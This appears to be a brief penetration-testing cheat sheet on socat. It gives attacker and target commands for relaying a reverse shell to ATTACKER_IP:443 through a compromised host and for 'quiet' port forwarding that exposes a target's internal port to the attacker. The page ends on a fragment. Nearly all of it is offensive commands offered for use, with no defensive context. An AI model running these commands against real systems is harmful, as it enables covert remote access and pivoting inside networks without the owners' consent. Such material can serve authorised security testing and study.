Socat
Reverse shell relay
Attacker:
sudo nc -lvnp 443 Target:
./socat tcp-l:8000 tcp:ATTACKER_IP:443 &Port Forwarding
socat TCP-LISTEN:1234,fork,reuseaddr tcp:127.0.0.1:8080 & Port forwarding (Quiet)
Attacker:
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &Target:
./socat tcp:ATTACKER_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &Close backgrounded socat
1:
Last updated